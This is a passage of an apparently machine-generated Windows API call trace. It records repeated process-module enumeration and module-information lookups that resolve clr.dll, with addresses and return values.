SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0217.661] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0217.661] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0217.662] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0217.662] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0217.662] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0217.663] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0217.663] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0217.664] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0217.664] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0217.665] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0217.665] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0217.666] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0217.666] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0217.667] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0217.667] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0217.668] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0217.669] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0217.669] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74860000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x74860000, SizeOfImage=0x6a8000, EntryPoint=0x749a7040)) returned 1 [0217.670] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74860000, lpBaseName=0x18e7b4, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0217.713] GetCurrentProcess () returned 0xffffffff [0217.713] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d950, cb=0x1000, lpcbNeeded=0x18eb64 | out: lphModule=0x18d950, lpcbNeeded=0x18eb64) returned 1 [0217.714] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0217.714] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0217.714] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0217.714] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0217.714] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0217.714] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0217.715] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0217.715] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0217.715] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0217.715] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0217.715] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0217.716] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0217.716] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0217.716] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0217.716] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0217.717] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0217.717] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0217.717] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0217.718] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0217.718] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0217.719] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0217.719] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0217.719] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0217.720] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0217.720] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0217.721] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0217.721] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0217.722] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0217.722] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0217.723] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0217.723] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0217.725] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0217.725] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0217.726] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0217.726] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74860000, lpmodinfo=0x18eb58, cb=0xc | out: lpmodinfo=0x18eb58*(lpBaseOfDll=0x74860000, SizeOfImage=0x6a8000, EntryPoint=0x749a7040)) returned 1 [0217.727] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74860000, lpBaseName=0x18e950, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0217.728] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll", lpSrch="\\system.ni.dll") returned 0x0 [0217.728] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0217.731] GetCurrentProcess () returned 0xffffffff [0217.731] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18dc88, cb=0x1000, lpcbNeeded=0x18ee9c | out: lphModule=0x18dc88, lpcbNeeded=0x18ee9c) returned 1 [0217.732] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0217.732] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0217.732] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0217.732] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0217.732] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0217.733] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0217.733] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0217.733] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0217.733] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0217.733] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0217.734] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0217.734] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0217.734] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0217.734] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0217.735] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0217.735] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0217.735] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0217.736] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0217.736] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0217.736] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0217.737] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0217.737] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0217.737] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0217.738] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0217.738] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0217.739] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0217.739] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0217.740] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0217.740] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0217.741] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0217.741] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0217.742] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0217.742] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0217.743] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0217.744] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74860000, lpmodinfo=0x18ee90, cb=0xc | out: lpmodinfo=0x18ee90*(lpBaseOfDll=0x74860000, SizeOfImage=0x6a8000, EntryPoint=0x749a7040)) returned 1 [0217.745] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74860000, lpBaseName=0x18ec88, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0217.753] GetCurrentProcess () returned 0xffffffff [0217.753] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d940, cb=0x1000, lpcbNeeded=0x18eb54 | out: lphModule=0x18d940, lpcbNeeded=0x18eb54) returned 1 [0217.753] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0217.754] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0217.754] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0217.754] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0217.754] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0217.754] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0217.754] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0217.755] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0217.755] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0217.755] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0217.755] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0217.755] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0217.756] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0217.756] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0217.756] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0217.757] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0217.757] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0217.757] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0217.758] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0217.758] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0217.758] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, 